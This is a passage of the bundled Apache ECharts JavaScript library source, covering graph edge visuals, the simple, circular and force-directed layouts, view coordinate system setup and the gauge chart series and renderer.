normalize$1(itemModel.getShallow('symbol', true));\n            var symbolSize = normalize$1(itemModel.getShallow('symbolSize', true));\n            // Edge visual must after node visual\n            var color = itemModel.get(colorQuery);\n            var opacity = itemModel.get(opacityQuery);\n            switch (color) {\n                case 'source':\n                    color = edge.node1.getVisual('color');\n                    break;\n                case 'target':\n                    color = edge.node2.getVisual('color');\n                    break;\n            }\n\n            symbolType[0] && edge.setVisual('fromSymbol', symbolType[0]);\n            symbolType[1] && edge.setVisual('toSymbol', symbolType[1]);\n            symbolSize[0] && edge.setVisual('fromSymbolSize', symbolSize[0]);\n            symbolSize[1] && edge.setVisual('toSymbolSize', symbolSize[1]);\n\n            edge.setVisual('color', color);\n            edge.setVisual('opacity', opacity);\n        });\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction simpleLayout$1(seriesModel) {\n    var coordSys = seriesModel.coordinateSystem;\n    if (coordSys && coordSys.type !== 'view') {\n        return;\n    }\n    var graph = seriesModel.getGraph();\n\n    graph.eachNode(function (node) {\n        var model = node.getModel();\n        node.setLayout([+model.get('x'), +model.get('y')]);\n    });\n\n    simpleLayoutEdge(graph);\n}\n\nfunction simpleLayoutEdge(graph) {\n    graph.eachEdge(function (edge) {\n        var curveness = edge.getModel().get('lineStyle.curveness') || 0;\n        var p1 = clone$1(edge.node1.getLayout());\n        var p2 = clone$1(edge.node2.getLayout());\n        var points = [p1, p2];\n        if (+curveness) {\n            points.push([\n                (p1[0] + p2[0]) / 2 - (p1[1] - p2[1]) * curveness,\n                (p1[1] + p2[1]) / 2 - (p2[0] - p1[0]) * curveness\n            ]);\n        }\n        edge.setLayout(points);\n    });\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar simpleLayout = function (ecModel, api) {\n    ecModel.eachSeriesByType('graph', function (seriesModel) {\n        var layout = seriesModel.get('layout');\n        var coordSys = seriesModel.coordinateSystem;\n        if (coordSys && coordSys.type !== 'view') {\n            var data = seriesModel.getData();\n\n            var dimensions = [];\n            each$1(coordSys.dimensions, function (coordDim) {\n                dimensions = dimensions.concat(data.mapDimension(coordDim, true));\n            });\n\n            for (var dataIndex = 0; dataIndex < data.count(); dataIndex++) {\n                var value = [];\n                var hasValue = false;\n                for (var i = 0; i < dimensions.length; i++) {\n                    var val = data.get(dimensions[i], dataIndex);\n                    if (!isNaN(val)) {\n                        hasValue = true;\n                    }\n                    value.push(val);\n                }\n                if (hasValue) {\n                    data.setItemLayout(dataIndex, coordSys.dataToPoint(value));\n                }\n                else {\n                    // Also {Array.<number>}, not undefined to avoid if...else... statement\n                    data.setItemLayout(dataIndex, [NaN, NaN]);\n                }\n            }\n\n            simpleLayoutEdge(data.graph);\n        }\n        else if (!layout || layout === 'none') {\n            simpleLayout$1(seriesModel);\n        }\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar PI$3 = Math.PI;\n\nvar _symbolRadiansHalf = [];\n\n/**\n * `basedOn` can be:\n * 'value':\n *     This layout is not accurate and have same bad case. For example,\n *     if the min value is very smaller than the max value, the nodes\n *     with the min value probably overlap even though there is enough\n *     space to layout them. So we only use this approach in the as the\n *     init layout of the force layout.\n *     FIXME\n *     Probably we do not need this method any more but use\n *     `basedOn: 'symbolSize'` in force layout if\n *     delay its init operations to GraphView.\n * 'symbolSize':\n *     This approach work only if all of the symbol size calculated.\n *     That is, the progressive rendering is not applied to graph.\n *     FIXME\n *     If progressive rendering is applied to graph some day,\n *     probably we have to use `basedOn: 'value'`.\n *\n * @param {module:echarts/src/model/Series} seriesModel\n * @param {string} basedOn 'value' or 'symbolSize'\n */\nfunction circularLayout$1(seriesModel, basedOn) {\n    var coordSys = seriesModel.coordinateSystem;\n    if (coordSys && coordSys.type !== 'view') {\n        return;\n    }\n\n    var rect = coordSys.getBoundingRect();\n\n    var nodeData = seriesModel.getData();\n    var graph = nodeData.graph;\n\n    var cx = rect.width / 2 + rect.x;\n    var cy = rect.height / 2 + rect.y;\n    var r = Math.min(rect.width, rect.height) / 2;\n    var count = nodeData.count();\n\n    nodeData.setLayout({\n        cx: cx,\n        cy: cy\n    });\n\n    if (!count) {\n        return;\n    }\n\n    _layoutNodesBasedOn[basedOn](seriesModel, coordSys, graph, nodeData, r, cx, cy, count);\n\n    graph.eachEdge(function (edge) {\n        var curveness = edge.getModel().get('lineStyle.curveness') || 0;\n        var p1 = clone$1(edge.node1.getLayout());\n        var p2 = clone$1(edge.node2.getLayout());\n        var cp1;\n        var x12 = (p1[0] + p2[0]) / 2;\n        var y12 = (p1[1] + p2[1]) / 2;\n        if (+curveness) {\n            curveness *= 3;\n            cp1 = [\n                cx * curveness + x12 * (1 - curveness),\n                cy * curveness + y12 * (1 - curveness)\n            ];\n        }\n        edge.setLayout([p1, p2, cp1]);\n    });\n}\n\nvar _layoutNodesBasedOn = {\n\n    value: function (seriesModel, coordSys, graph, nodeData, r, cx, cy, count) {\n        var angle = 0;\n        var sum = nodeData.getSum('value');\n        var unitAngle = Math.PI * 2 / (sum || count);\n\n        graph.eachNode(function (node) {\n            var value = node.getValue('value');\n            var radianHalf = unitAngle * (sum ? value : 1) / 2;\n\n            angle += radianHalf;\n            node.setLayout([\n                r * Math.cos(angle) + cx,\n                r * Math.sin(angle) + cy\n            ]);\n            angle += radianHalf;\n        });\n    },\n\n    symbolSize: function (seriesModel, coordSys, graph, nodeData, r, cx, cy, count) {\n        var sumRadian = 0;\n        _symbolRadiansHalf.length = count;\n\n        var nodeScale = getNodeGlobalScale(seriesModel);\n\n        graph.eachNode(function (node) {\n            var symbolSize = getSymbolSize$1(node);\n\n            // Normally this case will not happen, but we still add\n            // some the defensive code (2px is an arbitrary value).\n            isNaN(symbolSize) && (symbolSize = 2);\n            symbolSize < 0 && (symbolSize = 0);\n\n            symbolSize *= nodeScale;\n\n            var symbolRadianHalf = Math.asin(symbolSize / 2 / r);\n            // when `symbolSize / 2` is bigger than `r`.\n            isNaN(symbolRadianHalf) && (symbolRadianHalf = PI$3 / 2);\n            _symbolRadiansHalf[node.dataIndex] = symbolRadianHalf;\n            sumRadian += symbolRadianHalf * 2;\n        });\n\n        var halfRemainRadian = (2 * PI$3 - sumRadian) / count / 2;\n\n        var angle = 0;\n        graph.eachNode(function (node) {\n            var radianHalf = halfRemainRadian + _symbolRadiansHalf[node.dataIndex];\n\n            angle += radianHalf;\n            node.setLayout([\n                r * Math.cos(angle) + cx,\n                r * Math.sin(angle) + cy\n            ]);\n            angle += radianHalf;\n        });\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar circularLayout = function (ecModel) {\n    ecModel.eachSeriesByType('graph', function (seriesModel) {\n        if (seriesModel.get('layout') === 'circular') {\n            circularLayout$1(seriesModel, 'symbolSize');\n        }\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/*\n* A third-party license is embeded for some of the code in this file:\n* Some formulas were originally copied from \"d3.js\" with some\n* modifications made for this project.\n* (See more details in the comment of the method \"step\" below.)\n* The use of the source code of this file is also subject to the terms\n* and consitions of the license of \"d3.js\" (BSD-3Clause, see\n* </licenses/LICENSE-d3>).\n*/\n\nvar scaleAndAdd$2 = scaleAndAdd;\n\n// function adjacentNode(n, e) {\n//     return e.n1 === n ? e.n2 : e.n1;\n// }\n\nfunction forceLayout$1(nodes, edges, opts) {\n    var rect = opts.rect;\n    var width = rect.width;\n    var height = rect.height;\n    var center = [rect.x + width / 2, rect.y + height / 2];\n    // var scale = opts.scale || 1;\n    var gravity = opts.gravity == null ? 0.1 : opts.gravity;\n\n    // for (var i = 0; i < edges.length; i++) {\n    //     var e = edges[i];\n    //     var n1 = e.n1;\n    //     var n2 = e.n2;\n    //     n1.edges = n1.edges || [];\n    //     n2.edges = n2.edges || [];\n    //     n1.edges.push(e);\n    //     n2.edges.push(e);\n    // }\n    // Init position\n    for (var i = 0; i < nodes.length; i++) {\n        var n = nodes[i];\n        if (!n.p) {\n            n.p = create(\n                width * (Math.random() - 0.5) + center[0],\n                height * (Math.random() - 0.5) + center[1]\n            );\n        }\n        n.pp = clone$1(n.p);\n        n.edges = null;\n    }\n\n    // Formula in 'Graph Drawing by Force-directed Placement'\n    // var k = scale * Math.sqrt(width * height / nodes.length);\n    // var k2 = k * k;\n\n    var initialFriction = opts.friction == null ? 0.6 : opts.friction;\n    var friction = initialFriction;\n\n    return {\n        warmUp: function () {\n            friction = initialFriction * 0.8;\n        },\n\n        setFixed: function (idx) {\n            nodes[idx].fixed = true;\n        },\n\n        setUnfixed: function (idx) {\n            nodes[idx].fixed = false;\n        },\n\n        /**\n         * Some formulas were originally copied from \"d3.js\"\n         * https://github.com/d3/d3/blob/b516d77fb8566b576088e73410437494717ada26/src/layout/force.js\n         * with some modifications made for this project.\n         * See the license statement at the head of this file.\n         */\n        step: function (cb) {\n            var v12 = [];\n            var nLen = nodes.length;\n            for (var i = 0; i < edges.length; i++) {\n                var e = edges[i];\n                if (e.ignoreForceLayout) {\n                    continue;\n                }\n                var n1 = e.n1;\n                var n2 = e.n2;\n\n                sub(v12, n2.p, n1.p);\n                var d = len(v12) - e.d;\n                var w = n2.w / (n1.w + n2.w);\n\n                if (isNaN(w)) {\n                    w = 0;\n                }\n\n                normalize(v12, v12);\n\n                !n1.fixed && scaleAndAdd$2(n1.p, n1.p, v12, w * d * friction);\n                !n2.fixed && scaleAndAdd$2(n2.p, n2.p, v12, -(1 - w) * d * friction);\n            }\n            // Gravity\n            for (var i = 0; i < nLen; i++) {\n                var n = nodes[i];\n                if (!n.fixed) {\n                    sub(v12, center, n.p);\n                    // var d = vec2.len(v12);\n                    // vec2.scale(v12, v12, 1 / d);\n                    // var gravityFactor = gravity;\n                    scaleAndAdd$2(n.p, n.p, v12, gravity * friction);\n                }\n            }\n\n            // Repulsive\n            // PENDING\n            for (var i = 0; i < nLen; i++) {\n                var n1 = nodes[i];\n                for (var j = i + 1; j < nLen; j++) {\n                    var n2 = nodes[j];\n                    sub(v12, n2.p, n1.p);\n                    var d = len(v12);\n                    if (d === 0) {\n                        // Random repulse\n                        set(v12, Math.random() - 0.5, Math.random() - 0.5);\n                        d = 1;\n                    }\n                    var repFact = (n1.rep + n2.rep) / d / d;\n                    !n1.fixed && scaleAndAdd$2(n1.pp, n1.pp, v12, repFact);\n                    !n2.fixed && scaleAndAdd$2(n2.pp, n2.pp, v12, -repFact);\n                }\n            }\n            var v = [];\n            for (var i = 0; i < nLen; i++) {\n                var n = nodes[i];\n                if (!n.fixed) {\n                    sub(v, n.p, n.pp);\n                    scaleAndAdd$2(n.p, n.p, v, friction);\n                    copy(n.pp, n.p);\n                }\n            }\n\n            friction = friction * 0.992;\n\n            cb && cb(nodes, edges, friction < 0.01);\n        }\n    };\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar forceLayout = function (ecModel) {\n    ecModel.eachSeriesByType('graph', function (graphSeries) {\n        var coordSys = graphSeries.coordinateSystem;\n        if (coordSys && coordSys.type !== 'view') {\n            return;\n        }\n        if (graphSeries.get('layout') === 'force') {\n            var preservedPoints = graphSeries.preservedPoints || {};\n            var graph = graphSeries.getGraph();\n            var nodeData = graph.data;\n            var edgeData = graph.edgeData;\n            var forceModel = graphSeries.getModel('force');\n            var initLayout = forceModel.get('initLayout');\n            if (graphSeries.preservedPoints) {\n                nodeData.each(function (idx) {\n                    var id = nodeData.getId(idx);\n                    nodeData.setItemLayout(idx, preservedPoints[id] || [NaN, NaN]);\n                });\n            }\n            else if (!initLayout || initLayout === 'none') {\n                simpleLayout$1(graphSeries);\n            }\n            else if (initLayout === 'circular') {\n                circularLayout$1(graphSeries, 'value');\n            }\n\n            var nodeDataExtent = nodeData.getDataExtent('value');\n            var edgeDataExtent = edgeData.getDataExtent('value');\n            // var edgeDataExtent = edgeData.getDataExtent('value');\n            var repulsion = forceModel.get('repulsion');\n            var edgeLength = forceModel.get('edgeLength');\n            if (!isArray(repulsion)) {\n                repulsion = [repulsion, repulsion];\n            }\n            if (!isArray(edgeLength)) {\n                edgeLength = [edgeLength, edgeLength];\n            }\n            // Larger value has smaller length\n            edgeLength = [edgeLength[1], edgeLength[0]];\n\n            var nodes = nodeData.mapArray('value', function (value, idx) {\n                var point = nodeData.getItemLayout(idx);\n                var rep = linearMap(value, nodeDataExtent, repulsion);\n                if (isNaN(rep)) {\n                    rep = (repulsion[0] + repulsion[1]) / 2;\n                }\n                return {\n                    w: rep,\n                    rep: rep,\n                    fixed: nodeData.getItemModel(idx).get('fixed'),\n                    p: (!point || isNaN(point[0]) || isNaN(point[1])) ? null : point\n                };\n            });\n            var edges = edgeData.mapArray('value', function (value, idx) {\n                var edge = graph.getEdgeByIndex(idx);\n                var d = linearMap(value, edgeDataExtent, edgeLength);\n                if (isNaN(d)) {\n                    d = (edgeLength[0] + edgeLength[1]) / 2;\n                }\n                var edgeModel = edge.getModel();\n                return {\n                    n1: nodes[edge.node1.dataIndex],\n                    n2: nodes[edge.node2.dataIndex],\n                    d: d,\n                    curveness: edgeModel.get('lineStyle.curveness') || 0,\n                    ignoreForceLayout: edgeModel.get('ignoreForceLayout')\n                };\n            });\n\n            var coordSys = graphSeries.coordinateSystem;\n            var rect = coordSys.getBoundingRect();\n            var forceInstance = forceLayout$1(nodes, edges, {\n                rect: rect,\n                gravity: forceModel.get('gravity'),\n                friction: forceModel.get('friction')\n            });\n            var oldStep = forceInstance.step;\n            forceInstance.step = function (cb) {\n                for (var i = 0, l = nodes.length; i < l; i++) {\n                    if (nodes[i].fixed) {\n                        // Write back to layout instance\n                        copy(nodes[i].p, graph.getNodeByIndex(i).getLayout());\n                    }\n                }\n                oldStep(function (nodes, edges, stopped) {\n                    for (var i = 0, l = nodes.length; i < l; i++) {\n                        if (!nodes[i].fixed) {\n                            graph.getNodeByIndex(i).setLayout(nodes[i].p);\n                        }\n                        preservedPoints[nodeData.getId(i)] = nodes[i].p;\n                    }\n                    for (var i = 0, l = edges.length; i < l; i++) {\n                        var e = edges[i];\n                        var edge = graph.getEdgeByIndex(i);\n                        var p1 = e.n1.p;\n                        var p2 = e.n2.p;\n                        var points = edge.getLayout();\n                        points = points ? points.slice() : [];\n                        points[0] = points[0] || [];\n                        points[1] = points[1] || [];\n                        copy(points[0], p1);\n                        copy(points[1], p2);\n                        if (+e.curveness) {\n                            points[2] = [\n                                (p1[0] + p2[0]) / 2 - (p1[1] - p2[1]) * e.curveness,\n                                (p1[1] + p2[1]) / 2 - (p2[0] - p1[0]) * e.curveness\n                            ];\n                        }\n                        edge.setLayout(points);\n                    }\n                    // Update layout\n\n                    cb && cb(stopped);\n                });\n            };\n            graphSeries.forceLayout = forceInstance;\n            graphSeries.preservedPoints = preservedPoints;\n\n            // Step to get the layout\n            forceInstance.step();\n        }\n        else {\n            // Remove prev injected forceLayout instance\n            graphSeries.forceLayout = null;\n        }\n    });\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// FIXME Where to create the simple view coordinate system\nfunction getViewRect$2(seriesModel, api, aspect) {\n    var option = seriesModel.getBoxLayoutParams();\n    option.aspect = aspect;\n    return getLayoutRect(option, {\n        width: api.getWidth(),\n        height: api.getHeight()\n    });\n}\n\nvar createView = function (ecModel, api) {\n    var viewList = [];\n    ecModel.eachSeriesByType('graph', function (seriesModel) {\n        var coordSysType = seriesModel.get('coordinateSystem');\n        if (!coordSysType || coordSysType === 'view') {\n\n            var data = seriesModel.getData();\n            var positions = data.mapArray(function (idx) {\n                var itemModel = data.getItemModel(idx);\n                return [+itemModel.get('x'), +itemModel.get('y')];\n            });\n\n            var min = [];\n            var max = [];\n\n            fromPoints(positions, min, max);\n\n            // If width or height is 0\n            if (max[0] - min[0] === 0) {\n                max[0] += 1;\n                min[0] -= 1;\n            }\n            if (max[1] - min[1] === 0) {\n                max[1] += 1;\n                min[1] -= 1;\n            }\n            var aspect = (max[0] - min[0]) / (max[1] - min[1]);\n            // FIXME If get view rect after data processed?\n            var viewRect = getViewRect$2(seriesModel, api, aspect);\n            // Position may be NaN, use view rect instead\n            if (isNaN(aspect)) {\n                min = [viewRect.x, viewRect.y];\n                max = [viewRect.x + viewRect.width, viewRect.y + viewRect.height];\n            }\n\n            var bbWidth = max[0] - min[0];\n            var bbHeight = max[1] - min[1];\n\n            var viewWidth = viewRect.width;\n            var viewHeight = viewRect.height;\n\n            var viewCoordSys = seriesModel.coordinateSystem = new View();\n            viewCoordSys.zoomLimit = seriesModel.get('scaleLimit');\n\n            viewCoordSys.setBoundingRect(\n                min[0], min[1], bbWidth, bbHeight\n            );\n            viewCoordSys.setViewRect(\n                viewRect.x, viewRect.y, viewWidth, viewHeight\n            );\n\n            // Update roam info\n            viewCoordSys.setCenter(seriesModel.get('center'));\n            viewCoordSys.setZoom(seriesModel.get('zoom'));\n\n            viewList.push(viewCoordSys);\n        }\n    });\n\n    return viewList;\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nregisterProcessor(categoryFilter);\n\nregisterVisual(visualSymbol('graph', 'circle', null));\nregisterVisual(categoryVisual);\nregisterVisual(edgeVisual);\n\nregisterLayout(simpleLayout);\nregisterLayout(PRIORITY.VISUAL.POST_CHART_LAYOUT, circularLayout);\nregisterLayout(forceLayout);\n\n// Graph view coordinate system\nregisterCoordinateSystem('graphView', {\n    create: createView\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar GaugeSeries = SeriesModel.extend({\n\n    type: 'series.gauge',\n\n    getInitialData: function (option, ecModel) {\n        return createListSimply(this, ['value']);\n    },\n\n    defaultOption: {\n        zlevel: 0,\n        z: 2,\n        // 默认全局居中\n        center: ['50%', '50%'],\n        legendHoverLink: true,\n        radius: '75%',\n        startAngle: 225,\n        endAngle: -45,\n        clockwise: true,\n        // 最小值\n        min: 0,\n        // 最大值\n        max: 100,\n        // 分割段数，默认为10\n        splitNumber: 10,\n        // 坐标轴线\n        axisLine: {\n            // 默认显示，属性show控制显示与否\n            show: true,\n            lineStyle: {       // 属性lineStyle控制线条样式\n                color: [[0.2, '#91c7ae'], [0.8, '#63869e'], [1, '#c23531']],\n                width: 30\n            }\n        },\n        // 分隔线\n        splitLine: {\n            // 默认显示，属性show控制显示与否\n            show: true,\n            // 属性length控制线长\n            length: 30,\n            // 属性lineStyle（详见lineStyle）控制线条样式\n            lineStyle: {\n                color: '#eee',\n                width: 2,\n                type: 'solid'\n            }\n        },\n        // 坐标轴小标记\n        axisTick: {\n            // 属性show控制显示与否，默认不显示\n            show: true,\n            // 每份split细分多少段\n            splitNumber: 5,\n            // 属性length控制线长\n            length: 8,\n            // 属性lineStyle控制线条样式\n            lineStyle: {\n                color: '#eee',\n                width: 1,\n                type: 'solid'\n            }\n        },\n        axisLabel: {\n            show: true,\n            distance: 5,\n            // formatter: null,\n            color: 'auto'\n        },\n        pointer: {\n            show: true,\n            length: '80%',\n            width: 8\n        },\n        itemStyle: {\n            color: 'auto'\n        },\n        title: {\n            show: true,\n            // x, y，单位px\n            offsetCenter: [0, '-40%'],\n            // 其余属性默认使用全局文本样式，详见TEXTSTYLE\n            color: '#333',\n            fontSize: 15\n        },\n        detail: {\n            show: true,\n            backgroundColor: 'rgba(0,0,0,0)',\n            borderWidth: 0,\n            borderColor: '#ccc',\n            width: 100,\n            height: null, // self-adaption\n            padding: [5, 10],\n            // x, y，单位px\n            offsetCenter: [0, '40%'],\n            // formatter: null,\n            // 其余属性默认使用全局文本样式，详见TEXTSTYLE\n            color: 'auto',\n            fontSize: 30\n        }\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar PointerPath = Path.extend({\n\n    type: 'echartsGaugePointer',\n\n    shape: {\n        angle: 0,\n\n        width: 10,\n\n        r: 10,\n\n        x: 0,\n\n        y: 0\n    },\n\n    buildPath: function (ctx, shape) {\n        var mathCos = Math.cos;\n        var mathSin = Math.sin;\n\n        var r = shape.r;\n        var width = shape.width;\n        var angle = shape.angle;\n        var x = shape.x - mathCos(angle) * width * (width >= r / 3 ? 1 : 2);\n        var y = shape.y - mathSin(angle) * width * (width >= r / 3 ? 1 : 2);\n\n        angle = shape.angle - Math.PI / 2;\n        ctx.moveTo(x, y);\n        ctx.lineTo(\n            shape.x + mathCos(angle) * width,\n            shape.y + mathSin(angle) * width\n        );\n        ctx.lineTo(\n            shape.x + mathCos(shape.angle) * r,\n            shape.y + mathSin(shape.angle) * r\n        );\n        ctx.lineTo(\n            shape.x - mathCos(angle) * width,\n            shape.y - mathSin(angle) * width\n        );\n        ctx.lineTo(x, y);\n        return;\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction parsePosition(seriesModel, api) {\n    var center = seriesModel.get('center');\n    var width = api.getWidth();\n    var height = api.getHeight();\n    var size = Math.min(width, height);\n    var cx = parsePercent$1(center[0], api.getWidth());\n    var cy = parsePercent$1(center[1], api.getHeight());\n    var r = parsePercent$1(seriesModel.get('radius'), size / 2);\n\n    return {\n        cx: cx,\n        cy: cy,\n        r: r\n    };\n}\n\nfunction formatLabel(label, labelFormatter) {\n    if (labelFormatter) {\n        if (typeof labelFormatter === 'string') {\n            label = labelFormatter.replace('{value}', label != null ? label : '');\n        }\n        else if (typeof labelFormatter === 'function') {\n            label = labelFormatter(label);\n        }\n    }\n\n    return label;\n}\n\nvar PI2$5 = Math.PI * 2;\n\nvar GaugeView = Chart.extend({\n\n    type: 'gauge',\n\n    render: function (seriesModel, ecModel, api) {\n\n        this.group.removeAll();\n\n        var colorList = seriesModel.get('axisLine.lineStyle.color');\n        var posInfo = parsePosition(seriesModel, api);\n\n        this._renderMain(\n            seriesModel, ecModel, api, colorList, posInfo\n        );\n    },\n\n    dispose: function () {},\n\n    _renderMain: function (seriesModel, ecModel, api, colorList, posInfo) {\n        var group = this.group;\n\n        var axisLineModel = seriesModel.getModel('axisLine');\n        var lineStyleModel = axisLineModel.getModel('lineStyle');\n\n        var clockwise = seriesModel.get('clockwise');\n        var startAngle = -seriesModel.get('startAngle') / 180 * Math.PI;\n        var endAngle = -seriesModel.get('endAngle') / 180 * Math.PI;\n\n        var angleRangeSpan = (endAngle - startAngle) % PI2$5;\n\n        var prevEndAngle = startAngle;\n        var axisLineWidth = lineStyleModel.get('width');\n        var showAxis = axisLineModel.get('show');\n\n        for (var i = 0; showAxis && i < colorList.length; i++) {\n            // Clamp\n            var percent = Math.min(Math.max(colorList[i][0], 0), 1);\n            var endAngle = startAngle + angleRangeSpan * percent;\n            var sector = new Sector({\n                shape: {\n                    startAngle: prevEndAngle,\n                    endAngle: endAngle,\n                    cx: posInfo.cx,\n                    cy: posInfo.cy,\n                    clockwise: clockwise,\n                    r0: posInfo.r - axisLineWidth,\n                    r: posInfo.r\n                },\n                silent: true\n            });\n\n            sector.setStyle({\n                fill: colorList[i][1]\n            });\n\n            sector.setStyle(lineStyleModel.getLineStyle(\n                // Because we use sector to simulate arc\n                // so the properties for stroking are useless\n                ['color', 'borderWidth', 'borderColor']\n            ));\n\n            group.add(sector);\n\n            prevEndAngle = endAngle;\n        }\n\n        var getColor = function (percent) {\n            // Less than 0\n            if (percent <= 0) {\n                return colorList[0][1];\n            }\n            for (var i = 0; i < colorList.length; i++) {\n                if (colorList[i][0] >= percent\n                    && (i === 0 ? 0 : colorList[i - 1][0]) < percent\n                ) {\n                    return colorList[i][1];\n                }\n            }\n            // More than 1\n            return colorList[i - 1][1];\n        };\n\n        if (!clockwise) {\n            var tmp = startAngle;\n            startAngle = endAngle;\n            endAngle = tmp;\n        }\n\n        this._renderTicks(\n            seriesModel, ecModel, api, getColor, posInfo,\n            startAngle, endAngle, clockwise\n        );\n\n        this._renderPointer(\n            